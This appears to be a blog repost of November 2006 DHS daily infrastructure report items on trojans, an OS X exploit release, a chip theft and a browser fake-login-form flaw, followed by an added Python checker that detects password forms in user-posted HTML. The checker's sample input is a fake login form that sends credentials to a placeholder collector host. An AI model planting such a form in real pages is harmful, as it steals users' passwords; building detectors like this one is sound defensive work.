To subscribe to the full report on a daily basis:
Send an eMail to dhsdailyadmin@mail.dhs.osis.gov with the subject "DHS Daily Open Source Infrastructure Report" and the following line in the body: subscribe
To obtain a complete copy of the current report proceed to the DHS link below.
To obtain reports more than 10 business days old, send an eMail to DHS_Reports@e-computer-security.com. Be specific as to the reports you wish to receive.

Daily Report Monday, November 27, 2006

Daily Highlights

· Bouncers at some New Jersey bars and nightclubs are using a high-tech identification device to obtain a customer's age as well as personal information on a driver's license such as name, address, and license number as well as physical descriptions such as height, weight, and eye color. (See item 11)
· The Associated Press reports the Bloomington Police Department's bomb squad removed what appeared to be an improvised explosive device from the trunk of a rental car Sunday, November 26, at the Minneapolis-St. Paul International Airport. (See item 12)
· Bloomberg reports two of New York City's commuter railroads will have delays for the next two weeks because a particularly bad season of so-called slippery rail -- caused by wet leaves falling on the rails -- has damaged the wheels of more than 360 rail cars. (See item 13)

Information Technology and Telecommunications Sector

29. November 24, Sophos — New Trojan tricks users with offer of free explicit images. Sophos has warned of a new spam campaign that claims to offer free explicit images and videos, in an attempt to trick users into downloading a malicious Trojan horse. According to Sophos, a Weblink to the Psyme-DL Trojan is being widely circulated within e-mails using a variety of subject lines, invariably containing the words "free" and "porn." The e-mails each contain a single sentence and a link to the malicious file.
Source: http://www.sophos.com/pressoffice/news/articles/2006/11/pornspam.html

30. November 24, Security Focus — IAdware Trojan aims for Macs. On Thursday, November 23, antivirus firm F-Secure published a brief analysis of a proof-of-concept adware program for the Mac OS X that could theoretically hook into any application to run attacker-specified code. The program, dubbed IAdware by F-Secure, could be silently installed in a user's account without requiring administrator rights. The IAdware proof-of-concept code did nothing malicious, but merely opened up a browser each time an application was opened, F-Secure stated.
Source: http://www.securityfocus.com/brief/366

31. November 24, VNUNet — IP Multimedia Subsystem full of gaps: Yankee Group. The IP Multimedia Subsystem (IMS) architecture is suffering from "gaping holes and inadequacies" which are limiting increased adoption and implementation of the communications standard, research has warned. These gaps in the architecture must be addressed by vendors and carriers that have invested in IMS as a unifying communications technology, according to a recently published Yankee Group report. The study noted that the growing interest of carriers in adopting IMS or next-generation architectures is met by increasing challenges. However, it acknowledges that all major carriers and vendors now have IMS in their road maps because it is being recognized as the unifying architecture.
Source: http://www.vnunet.com/vnunet/news/2169423/ims-plagued-gaping-holes

Daily Highlights

· In the first nuclear-related evacuation since the Three Mile Island accident of 1979, a Tennessee school district sent all 1,800 pupils home on Tuesday morning, November 21, because operators at a nearby nuclear reactor believed they might have had a leak of radioactive cooling water inside the plant. (See item 2)
· The Associated Press reports a chemical plant near Boston exploded early Wednesday, November 22, sparking a massive fire and blowing debris for blocks that damaged nearly 90 homes but caused only minor injuries. (See item 5)
· The Department of Homeland Security and the Department of State have announced the official requirement for citizens of the United States, Canada, Mexico, and Bermuda to present a passport to enter the United States when arriving by air from any part of the Western Hemisphere beginning January 23, 2007. (See item 16)
· WHO-TV reports nearly 1,000 Iowans have gotten ill in the last several weeks due to norovirus, which has occurred in a wide variety of settings such as social receptions, long-term care facilities, a gaming facility, business functions, restaurants, and schools. (See item 27)

Information Technology and Telecommunications Sector

34. November 22, eWeek — Exploit code published for Apple OS X glitch. Researchers have published exploit code that targets an unpatched kernel vulnerability in Apple's OS X desktop software. An independent vulnerability analyst working as part of the "Month of Kernel Bugs" campaign released the details necessary to attack the hole in OS X on Wednesday, November 22, revealing the manner in which hackers could target the glitch, which affects the way Apple's software handles disk image files. The researcher, identified only by the screen name "LMH," issued the exploit via a post on the Kernel Fun Website. "Mac OS X fails to properly handle corrupted image structures, leading to an exploitable denial-of-service condition," LMH wrote in his latest blog. "Although it hasn't been checked further, memory corruption is present under certain conditions." The researcher said that the demonstration exploit offered on the site would be unlikely to allow arbitrary code execution if applied by attackers; however, the analyst indicated that the flaw could be taken advantage of by malware writers by targeting the manner in which Cupertino, CA-based Apple's Safari browser downloads online image files.
Source: http://www.eweek.com/article2/0,1895,2062806,00.asp

35. November 22, IDG News Service — Thieves steal chips worth millions. A gang of thieves stole computer chips reportedly worth millions of U.S. dollars in a Monday, November 20, raid on the Penang International Airport Free Commercial Zone in Batu Muang, Malaysia. Malaysian police are investigating the theft. The gang of 20 thieves subdued 17 security guards using weapons and chloroform before stealing 585 cartons and 18 pallets of microchips and motherboards manufactured by a multinational company in Bayan Lepas, Malaysia. The stolen goods were estimated to be worth $12.7 million, making the theft the largest ever in Malaysia.
Source: http://www.infoworld.com/article/06/11/22/HNchipthieves_1.html

36. November 22, CNET News — Firefox, IE vulnerable to fake login pages. Mozilla's Firefox 2 and Microsoft's Internet Explorer 7 are vulnerable to a flaw that could allow attackers to steal passwords. Dubbed a reverse cross-site request, or RCSR, vulnerability by its discoverer, Robert Chapin, the flaw lets hackers compromise users' passwords and usernames by presenting them with a fake login form. Firefox Password Manager will automatically enter any saved passwords and usernames into the form. The data is then automatically sent to an attacker's computer without the user's knowledge, according to the Chapin Information Services site. An exploit for this flaw has already been seen on social-networking site MySpace.com, and it could affect anyone using a blog or forum that allows user-generated HTML code to be added, according to Chapin. According to Chapin, an RCSR attack is much more likely to succeed than a cross-site scripting attack because neither Internet Explorer nor Firefox is designed to check the destination of form data before the user submits them. The browser doesn't sound an alarm because the exploit is conducted at the trusted Website.
Source: http://news.com.com/Firefox%2C+IE+vulnerable+to+fake+login+pages/2100-1002_3-6137844.html?tag=nefd.top
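
The RCSR item turns on two facts: the site accepts user-generated HTML, and the browser fills saved credentials into a form without checking where the form posts. As an added example (not code from the DHS report or from Chapin Information Services), this Python check is one a blog or forum could run on submitted HTML to flag any form carrying a password field and to note whether its action leaves the site; forum.example and collector.example are constructed placeholder hosts.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample: a forum post (user-generated HTML) carrying a login form.
SAMPLE_POST = ('<p>Nice photos!</p><form action="https://collector.example/c" method="post">'
               '<input name="user"><input type="PASSWORD" name="pass"></form>')

def origin(url):
    """(scheme, host, port) of a URL, with default ports filled in."""
    p = urlsplit(url)
    return (p.scheme, (p.hostname or "").lower(), p.port or {"http": 80, "https": 443}.get(p.scheme))

class FormAudit(HTMLParser):
    """Records forms in a user-supplied fragment that contain a password field."""
    def __init__(self, page_url):
        super().__init__()
        self.page_url, self.current, self.findings = page_url, None, []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            # A missing or relative action resolves against the hosting page.
            target = urljoin(self.page_url, a.get("action", "").strip())
            self.current = {"target": target, "password": False}
        elif tag == "input" and self.current is not None:
            if a.get("type", "").strip().lower() == "password":
                self.current["password"] = True
    def handle_endtag(self, tag):
        if tag == "form":
            self._finish()
    def close(self):
        super().close()
        self._finish()  # an unterminated <form> is still rendered by browsers

    def _finish(self):
        form, self.current = self.current, None
        if form and form["password"]:
            offsite = origin(form["target"]) != origin(self.page_url)
            self.findings.append((form["target"], "off-site" if offsite else "same-site"))

def audit_fragment(fragment, page_url):
    """Return [(resolved action URL, 'off-site' | 'same-site')] for password forms."""
    parser = FormAudit(page_url)
    parser.feed(fragment)
    parser.close()
    return parser.findings

if __name__ == "__main__":
    print(audit_fragment(SAMPLE_POST, "https://forum.example/thread/1"))
```

A same-site finding is still worth rejecting, since user content has no reason to present a password field on a page where the browser will autofill the site's saved login.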

About Me

U.S. Army Retired Chief Warrant Officer with more than 40 years in information technology and 35 years in information security. Became a Certified Information Systems Security Professional in 1995 and have taught computer security in Asia, Canada and the United States. Wrote a computer security column for 5 years in the 1980s titled "for the Sake Of Security", penname R. E. (Bob) Johnston, which was published in Computer Decisions.
Motto: "When entrusted to process, you are obligated to safeguard"